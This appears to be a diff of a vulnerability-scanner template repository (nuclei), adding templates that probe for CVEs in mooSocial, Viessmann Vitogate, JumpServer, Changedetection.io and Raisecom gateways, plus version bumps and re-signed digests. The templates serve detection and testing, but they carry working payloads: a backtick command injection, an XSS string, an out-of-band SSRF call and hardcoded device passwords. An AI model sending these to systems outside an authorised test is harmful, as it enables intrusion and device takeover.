{"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"}
|
||||||
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
||||||
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
b69b59d70bacb648d224873b1b83419e
|
734828cf4c7ab354d5a5ccb1fed89917
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
3.2.7
|
3.2.8
|
|
@ -1 +1 @@
|
||||||
1.4.7
|
1.4.8
|
|
@ -1 +1 @@
|
||||||
2.7.7
|
2.8.0
|
|
@ -1 +1 @@
|
||||||
18.8.0
|
18.9.0
|
|
@ -1 +1 @@
|
||||||
3.0.5
|
3.0.6
|
|
@ -1 +1 @@
|
||||||
9.7.0.1
|
9.7.1
|
|
@ -1 +1 @@
|
||||||
7.9.2
|
8.0.1
|
|
@ -1 +1 @@
|
||||||
3.16.5
|
3.16.6
|
|
@ -0,0 +1,64 @@
|
||||||
|
id: CVE-2023-43323
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: mooSocial 3.1.8 - External Service Interaction
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.
|
||||||
|
impact: |
|
||||||
|
An attacker can exploit this vulnerability to interact with external services.
|
||||||
|
remediation: |
|
||||||
|
Upgrade to a patched version of mooSocial to mitigate CVE-2023-43323.
|
||||||
|
reference:
|
||||||
|
- https://github.com/ahrixia/CVE-2023-43323
|
||||||
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-43323
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2023-43323
|
||||||
|
epss-score: 0.00046
|
||||||
|
epss-percentile: 0.15636
|
||||||
|
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
vendor: moosocial
|
||||||
|
product: moostore
|
||||||
|
shodan-query: http.favicon.hash:702863115clear
|
||||||
|
fofa-query:
|
||||||
|
- mooSocial
|
||||||
|
- moosocial
|
||||||
|
- icon_hash="702863115"
|
||||||
|
tags: cve,cve2023,moosocial,oast
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "mooConfig"
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /activities/ajax_share HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
- "dns"
|
||||||
|
# digest: 4b0a00483046022100af09f14a1bcd4be57e652230a0edeb33311aa7089079b7b43a89ab4d6e5d2828022100fa18b8c9cd1e37934659cad5d0a55252f7a75aeb4e9e84d7fa33b68f17c6c97d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,70 @@
|
||||||
|
id: CVE-2023-5222
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Viessmann Vitogate 300 - Hardcoded Password
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.
|
||||||
|
impact: |
|
||||||
|
An attacker could potentially gain unauthorized access to the device.
|
||||||
|
remediation: |
|
||||||
|
Update the device firmware to remove the hardcoded password or change it to a strong, unique password.
|
||||||
|
reference:
|
||||||
|
- https://vuldb.com/?ctiid.240364
|
||||||
|
- https://vuldb.com/?id.240364
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-5222
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-5222
|
||||||
|
cwe-id: CWE-259
|
||||||
|
epss-score: 0.00164
|
||||||
|
epss-percentile: 0.52433
|
||||||
|
cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
shodan-query: title:"Vitogate 300"
|
||||||
|
fofa-query: title="Vitogate 300"
|
||||||
|
vendor: viessmann
|
||||||
|
product: vitogate_300_firmware
|
||||||
|
tags: cve,cve2023,viessmann,vitogate,default-login
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /cgi-bin/vitogate.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- vitomaster
|
||||||
|
- vitogate
|
||||||
|
password:
|
||||||
|
- viessmann1917
|
||||||
|
- viessmann
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'admin":true'
|
||||||
|
- '"sessionId":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a0046304402205e4d25f934e60a71c86c0383fc9ea75d3d60a8eab84da76ba0f74a428eebbfb302200b230092cf6e1e982cf44258fe996e03cf7df7774d8e291fea40c94e96f08950:922c64590222798bb761d5b6d8e72950
|
|
@ -23,7 +23,7 @@ info:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 2
|
max-request: 2
|
||||||
shodan-query: http.component:"Adobe ColdFusion"
|
shodan-query: http.component:"Adobe ColdFusion"
|
||||||
tags: cve,cve2024,adobe,condfusion,lfr
|
tags: cve,cve2024,adobe,coldfusion,lfr
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -53,4 +53,4 @@ http:
|
||||||
regex:
|
regex:
|
||||||
- "<var name='uuid'><string>(.*)</string>"
|
- "<var name='uuid'><string>(.*)</string>"
|
||||||
internal: true
|
internal: true
|
||||||
# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,47 @@
|
||||||
|
id: CVE-2024-24763
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: JumpServer < 3.10.0 - Open Redirect
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
|
||||||
|
reference:
|
||||||
|
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-24763
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
|
||||||
|
cvss-score: 4.3
|
||||||
|
cve-id: CVE-2024-24763
|
||||||
|
cwe-id: CWE-601
|
||||||
|
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
vendor: fit2cloud
|
||||||
|
product: jumpserver
|
||||||
|
fofa-query:
|
||||||
|
- title="JumpServer"
|
||||||
|
- title="jumpserver"
|
||||||
|
tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /{{paths}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
paths:
|
||||||
|
- "core/auth/login/?next=//oast.me"
|
||||||
|
- "auth/login/?next=//oast.me"
|
||||||
|
- "login/?next=//oast.me"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
|
||||||
|
# digest: 4a0a00473045022100836a3b8a6b0652ccba5de5d740f9ebe69c24c2ec61e316b7ff34a75a6f4b7f8e02205b9d09c0f06a3828e9e8605e0841ab78f7648a7d82361b5a506ab3b1d88cd9df:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: CVE-2024-34061
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Changedetection.io <=v0.45.21 - Cross-Site Scripting
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-pwgc-w4x9-gw67
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-34061
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
|
||||||
|
cvss-score: 4.3
|
||||||
|
cve-id: CVE-2024-34061
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
shodan-query: html:"Change Detection"
|
||||||
|
tags: cve,cve2024,changedetection,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /settings HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
csrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<img src=x onerror=alert(document.domain)>'
|
||||||
|
- 'is not a valid AppRise URL'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: csrf_token
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'name="csrf_token" value="([^"]+)"'
|
||||||
|
internal: true
|
||||||
|
# digest: 4b0a00483046022100a26d7a719f6bde174ab2a4ce1f996610abd24a3fe1dd22367ddfad90424a604a022100ceb749dac5236c2e827d447cb1709f0895ce46da346dead8eb19b2634d6ab9f8:922c64590222798bb761d5b6d8e72950
|
|
@ -49,3 +49,4 @@ http:
|
||||||
- contains_all(body_2, "SQL logic error","table exp already exists")
|
- contains_all(body_2, "SQL logic error","table exp already exists")
|
||||||
- contains(header_1, 'psession')
|
- contains(header_1, 'psession')
|
||||||
condition: and
|
condition: and
|
||||||
|
# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2024-7120
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.
|
||||||
|
reference:
|
||||||
|
- https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707?pvs=4
|
||||||
|
- https://vuldb.com/?ctiid.272451
|
||||||
|
- https://vuldb.com/?id.272451
|
||||||
|
- https://vuldb.com/?submit.380167
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
|
||||||
|
cvss-score: 6.3
|
||||||
|
cve-id: CVE-2024-7120
|
||||||
|
cwe-id: CWE-78
|
||||||
|
epss-score: 0.00046
|
||||||
|
epss-percentile: 0.16951
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
fofa-query: '"<TITLE>Web user login</TITLE>" && "<META content\==MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>"'
|
||||||
|
tags: cve,cve2024,intrusive,raisecom,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
- |
|
||||||
|
GET /tmp/info.html HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "{{randstr}}"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4b0a00483046022100f825ff9aa104f675a7d11ac402b1eb594688591c3cef8dbab4feb41cc065f415022100b74ba964b5441d9580eb432a280ebcd4128fe1cf70e37b61e6855f8405877bf2:922c64590222798bb761d5b6d8e72950
|
|
@ -45,6 +45,13 @@ http:
|
||||||
condition: and
|
condition: and
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'accessToken'
|
||||||
|
- 'AdminFirstTime'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
@ -53,5 +60,4 @@ http:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- accessToken
|
- accessToken
|
||||||
|
# digest: 4a0a00473045022100adf8a4c12e354461e80b4a00ab99ae10c5b82fefee98c10029107b3d2063620f022060eb930abe08c48fa92c7e817046a6a999feabe76aff9b2e6052a78f877c6e9d:922c64590222798bb761d5b6d8e72950
|
||||||
# digest: 4a0a00473045022100d7669b05e2b655bf42189bd5a1f1c6d312b55ef0f2226d74125a06af7716cb4c02200e5bbd064a3fa4485e6a2e29f0df4dae44e75252a08137974489591ca8e284c5:922c64590222798bb761d5b6d8e72950
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: changedetection-unauth
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Changedetection.io Dashboard - Exposure
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Changedetection.io unauth panel detected.
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: html:"Change Detection"
|
||||||
|
tags: changedetection,unauth,exposure
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'SETTINGS</a>'
|
||||||
|
- 'Change Detection'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4b0a00483046022100f4b0ac9c92eab0ea4d6fe36f3ec453a9b691a2148aafe9f281e9f6efaa1321b7022100c1e4e18be5f9c2ee3252c843294e680b6f1db68a590357408673dc56d9115085:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100f36c560f74676f791f1934da3e3fa2a1c34045ba97b7cb378f6da7118e1372f5022007f4901c1254dbe0ea148b66aeda99bde7c358a4e8ae6914cd6aa459c03d00b1:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100bb21c1a47541da16e8bda0d6b7655bac6e4c0501f14293739586047952f741cb0221008e68d88a15b4ea97a4744ffe7ef8235a34b0f2a3e08df42d3e886a9030ee1a59:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022047b773e54b7d2133d0d0a410d1af46f4040e06e6117e1aaf3a95d0d69997c53102203b01dcf3bbf908b9abe4da67f2a9e9a0ed22ab9150241be31cceefa91ea2f015:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100a96ab15ddb89d8065dbf2aaaab430e20d82439033be26c342aaa13ab6b30485d022100d2bebd77742fa09a8178c6ea4cb0434ae71bdd06dbb16aa64844ed35d5909f3d:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402202ce33574e3b018b75d389fee9fd3636b5aece92b5e58066a53bc43324c9dd57a022012815c05d76395e0c8f9b873d4552fb60b841e9472f8f26219c3fcdc3ecdb697:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100f666e6fd4c4a8dc99c92bda47f10e36a8558d666e8eb895a83e1636f89a6a87602200ed373b3a15fe11b1b58d67abaa577d8f8d2f76ed38931c60ea172cc708af9ce:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100f90b5c64f5e2ba5400e345f2353252f8e98caac3c2cb1efce0a55e06d9cf430702204c18646406c16f03608d01b9371e1081844c8014a696f3323d212b6409506c5f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022015e0aa337a86699ec98fe00b80b4f3f2f53e8f5a5a86dc2221c348e4f3037db40221008cea985c8f92186bcbf6605558c8fdb9200d9426692101f40ae95ef239c4722b:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402203a6f0c7df79a258c742fa868a964e4d46b86919a8f39c7cf64ca675cd14e819e0220344e033ed04d94404ef0949f46cd8fa71098cf8fdcbb53d9e9816fba491214bc:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220554eff996af197cd8fbfd6eeefb3959e5dffb907a99939dda5ee543908619b51022024e9187952242074e1cf7995bade104c2496b7cf711f118003a04fd33b349692:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450220330d517911db2bc4a00124e36e514a002d8b4b0b637cc8d21b1784fe0e6ed24e0221009cdc038f99a2261a42cb4439b895391b8fa3425a9fc424a8d7629e81d56166c0:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100e044b71e883a3edb2bc724d1c8d2a269d27475c212d844d67fb85a82eb03ba1c022100e2cd7e62585b6363649103f00656850fb4b03a709c07a41a47bd2995787ba4d0:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100f2b34731b9796a79058fc0d2e1d69d4f513380815ab86f9e45c880f0bc31a3550220057119ebd81bf898e2e82519d16dd291266a88f231e4b8292c8066da7ce04de8:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022069ffa28f501d1c8c8bc5c2b0ffca5f5712212f3038cd905e9ef62ec94cd792fe02203d6333298e0a1bca424dfb676ea314fb79747549696d2382fd7df8dae793da16:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100a621799f480dc9d982f6aef8eeeccefeda6dea8b96d7fdebb8222431fe45b8ef022100896a5f6c53544a89128a7b1b67692a28789ab443f1b110407b8722a6c89fb8b3:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402201888151a74948f6f450782d958e7c94aa6fdbd464334df3f38556d6a0c0493d202207340a2f97036e32848bcd2d158b9ab58e451b9bdbc9e99091a6b1393ab29bd9a:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402202e739a62b48fbd873d766243f85310b8e9c048817c16e45cb6e291f2facbb41302202120965ec8596a5d028c5a500e2b77d45e5946a3cd55dcc75ededef61a616b70:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402200cfd7ea8d09607ce19cb3acc996f8edf04c248af9219f5179981f18cfc58e67b02204617673cd30134d4eb6009ff9dc057e466ab06d1c0937a1a936504a11346655d:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022045ef2ea384c7b3f098ed5fcda2db643c76e4a4b563cb667ab6000511dfd1bf6b022018451c7b800c7bfac41fe3f50ff82f70b557c7fc0637e26902423c7322ff00c3:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022053629a1f8dbc2129095bc0c59e624420cf6f9e58fc895f6282ef1b6868d0448c02204be07a1b073c13687090a44dec6d0885d4a863cc2313d50a6706037a6e8259bd:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100ec5fc96a9c62987b9914f1748ba08f441cd5c72a2d13b80e11d3230800e43ff90221009554c7e89e0f62d841c998c0313bf3bc79dfabee85db79f39037d5c32fa5d14b:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402204090c001c08407db2736b0c1bce27aeef80dd07e6b0bc19ed3f9591889e52d1102206f71b893e4efaaf9780e9c761a836e372aa8951fbc6f019e5aef9ae9a6f159ac:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100aeedc10cdba61c2286e89cb8182a37c95ee8157a342aa873c1ce5005346446460220453a05274572ba573b4691cab5ea826c0c3d202f56f0a6ebeb7e83df09927744:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100c2ac2c5c4018dbc04d013e7dd6d6329aed676865ef8daf43a4f4b9051ea72721022004f0f4abb9a29928fda90d6ef7c47fba4c9b83961dc300901fa03106a2677ac2:922c64590222798bb761d5b6d8e72950
|
|
